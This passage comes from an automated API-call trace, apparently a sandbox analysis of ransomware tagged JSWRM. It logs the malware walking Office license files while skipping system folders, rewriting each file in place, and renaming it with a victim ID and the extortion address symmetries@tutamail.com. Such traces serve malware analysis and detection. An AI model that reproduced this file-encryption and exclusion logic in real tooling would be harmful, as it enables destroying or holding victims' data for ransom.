returned 1 [0110.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.196] CloseHandle (hObject=0x45c) returned 1 [0110.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0110.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0110.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0110.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0110.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0110.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0110.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.196] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0110.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0110.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0110.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.197] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb6ec7d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb6ec7d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb785126, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29cf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", cAlternateFileName="SKYPES~2.XRM")) returned 1 [0110.197] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2=".") returned 1 [0110.197] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="..") returned 1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="...") returned 1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="windows") returned -1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="recovery") returned 1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.198] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpString2="msocache") returned 1 [0110.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0110.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0110.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0110.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0110.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeServiceBypassR_PrepidBypass-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0110.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0110.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0110.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0110.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0110.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.199] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10703) returned 1 [0110.199] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29c0) returned 0x24c1d0 [0110.199] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29c0, lpOverlapped=0x0) returned 1 [0110.201] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.201] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29c0, lpOverlapped=0x0) returned 1 [0110.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.201] CloseHandle (hObject=0x45c) returned 1 [0110.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0110.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0110.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0110.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0110.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0110.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0110.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.202] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0110.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0110.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0110.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.203] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb75eedd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb75eedd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb843cf3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a2d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", cAlternateFileName="SKYPES~3.XRM")) returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2=".") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="..") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="...") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="windows") returned -1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.203] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0110.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0110.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0110.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0110.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0110.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0110.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0110.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0110.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0110.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.204] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6701) returned 1 [0110.204] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a20) returned 0x205850 [0110.204] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a20, lpOverlapped=0x0) returned 1 [0110.208] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.208] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a20, lpOverlapped=0x0) returned 1 [0110.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0110.208] CloseHandle (hObject=0x45c) returned 1 [0110.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0110.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0110.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0110.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0110.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0110.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0110.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0110.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0110.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0110.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.236] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.236] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62dc06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb62dc06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb738c87, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2cfa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", cAlternateFileName="SKYPES~1.XRM")) returned 1 [0110.240] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.240] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.240] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.240] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.240] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.240] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.241] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.241] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.241] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.241] lstrcmpiW (lpString1="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0110.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0110.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0110.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0110.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0110.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0110.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0110.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0110.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, 